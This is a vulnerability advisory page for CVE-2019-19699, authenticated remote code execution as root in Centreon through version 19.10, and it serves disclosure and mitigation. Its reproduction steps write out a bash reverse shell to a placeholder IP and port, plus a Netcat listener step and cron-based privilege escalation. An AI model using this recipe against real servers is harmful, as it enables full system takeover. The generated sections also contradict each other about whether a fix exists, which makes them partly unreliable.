VYPR
← All advisories
Unrated severityNVD Advisory· Published Apr 6, 2020· Updated Aug 5, 2024

CVE-2019-19699

CVE-2019-19699

Description

Authenticated remote code execution in Centreon ≤ 19.10 via Pollers misconfiguration allows apache user to execute commands as root via a cron job.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Authenticated remote code execution in Centreon ≤ 19.10 via Pollers misconfiguration allows apache user to execute commands as root via a cron job.

Vulnerability

An authenticated remote code execution vulnerability exists in Centreon Infrastructure Monitoring Software through version 19.10 [1][2][3]. The issue lies in the Pollers configuration: an administrator with access to the Centreon Web Interface can create a custom command via main.php?p=60803&type=3 and then assign it as a Post-Restart Command for a poller via main.php?p=60901&o=c&server_id=1 [3]. When the poller configuration is exported, the command is executed. Due to a misconfiguration in the apache crontab, an executable file modified by the apache user runs as root daily at 22:30 [3][4].

Exploitation

An attacker must have Admin access to the Centreon Web Interface [3][4]. The attacker creates a malicious miscellaneous command (e.g., a bash reverse shell) via Configuration > Commands > Miscellaneous, then assigns it to the Centreon central poller as a Post-Restart Command via Configuration > Pollers > Modify a poller Configuration [3]. The attacker then exports the poller configuration with the "Restart Monitoring Engine" and "Post generation command" options checked, and selects "Restart" [3]. This triggers the poller restart, executing the malicious command as the apache user [3]. The attacker subsequently leverages a cron job (e.g., /etc/cron.d/centreon_autodisc.pl) that runs as root to escalate privileges [3][4].

Impact

Successful exploitation results in remote code execution as the apache user initially, followed by privilege escalation to root via a misconfigured cron job [3][4]. The attacker gains full system compromise, including the ability to execute arbitrary commands, modify system files, and persist access [4]. The CIA impact is complete: confidentiality, integrity, and availability are all compromised [3][4].

Mitigation

Centreon released fixes after version 19.10 [1][3]. Users should upgrade to a supported version of Centreon (e.g., Centreon Web 24.04.26 or later) [1]. If upgrading is not immediately possible, restrict Admin access to the Centreon Web Interface to trusted users only, and review and disable any custom miscellaneous commands or poller post-restart commands that are not required [3][4]. According to the CVE description, this issue was found in versions through 19.10; no KEV listing was observed at the time of publication.

References
  1. Open Source IT Infrastructure Monitoring Tool
  2. Centreon: Observability Platform
  3. GitHub - SpengeSec/CVE-2019-19699: Centreon =<19.10 Authenticated RCE
  4. CVE's | Spenge's Cybersecurity Blog

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • Centreon/Infrastructure Monitoring Softwaredescription
  • Centreon/Centreonllm-fuzzy
    Range: <=19.10

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing access control on the Poller Post-Restart Command configuration allows an Admin user to set an arbitrary command that executes with the privileges of the monitoring engine when the poller restarts."

Attack vector

An authenticated attacker with Admin access to the Centreon Web Interface creates a malicious Miscellaneous command (e.g., a bash reverse shell) via Configuration > Commands > Miscellaneous [ref_id=1]. The attacker then navigates to Configuration > Pollers, selects the Central poller, and sets the Post-Restart Command to the previously created malicious command [ref_id=1]. When the attacker exports the poller configuration with the "Restart Monitoring Engine" and "Post generation command" options enabled, the poller restarts and executes the attacker's command [ref_id=1]. This gives the attacker a reverse shell as the apache user, which can then be leveraged for privilege escalation via cron-based attacks [ref_id=1].

Affected code

The vulnerability lies in the Poller configuration functionality accessible via main.php?p=60901&o=c&server_id=1 [ref_id=1]. The Post-Restart Command field allows an Admin to select any Miscellaneous command (created via main.php?p=60803&type=3) without sanitization or privilege checks on the command content [ref_id=1]. The export mechanism at Configuration > Pollers triggers execution of this command when the poller restarts [ref_id=1].

What the fix does

No patch is included in the bundle. The advisory does not specify a vendor fix; the CVE affects Centreon through version 19.10 [ref_id=1]. The recommended mitigation is to restrict Admin access to trusted users only and to monitor the Post-Restart Command configuration for unauthorized changes [ref_id=1]. The researcher's walkthrough also demonstrates that privilege escalation via cron misconfiguration (CVE-2019-16406) can follow, so administrators should additionally secure cron jobs executed by root [ref_id=1].

Preconditions

  • authAttacker must have Admin-level access to the Centreon Web Interface.
  • networkAttacker must have network access to the Centreon Web Interface.
  • inputAttacker must create a malicious Miscellaneous command and set it as the Post-Restart Command for a poller.

Reproduction

1. Log in as Admin to the Centreon web panel. 2. Navigate to Configuration > Commands > Miscellaneous, click Add, and create a bash reverse shell: `#!/bin/bash\nbash -i >& /dev/tcp/{IP}/{PORT} 0>&1`. Click Save. 3. Navigate to Configuration > Pollers, click on the Central poller. 4. Scroll down to "Post-restart command", select the reverse shell command, and click Save. 5. Start a Netcat listener on your machine. 6. Click Export configuration in Configuration > Pollers, select the Central poller, untick "Generate Configuration Files" and "Run monitoring engine debug (-v)", tick "Restart Monitoring Engine" and "Post generation command", select "Restart" as Method, and click Export. 7. The reverse shell connects to your listener [ref_id=1].

Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4

News mentions

1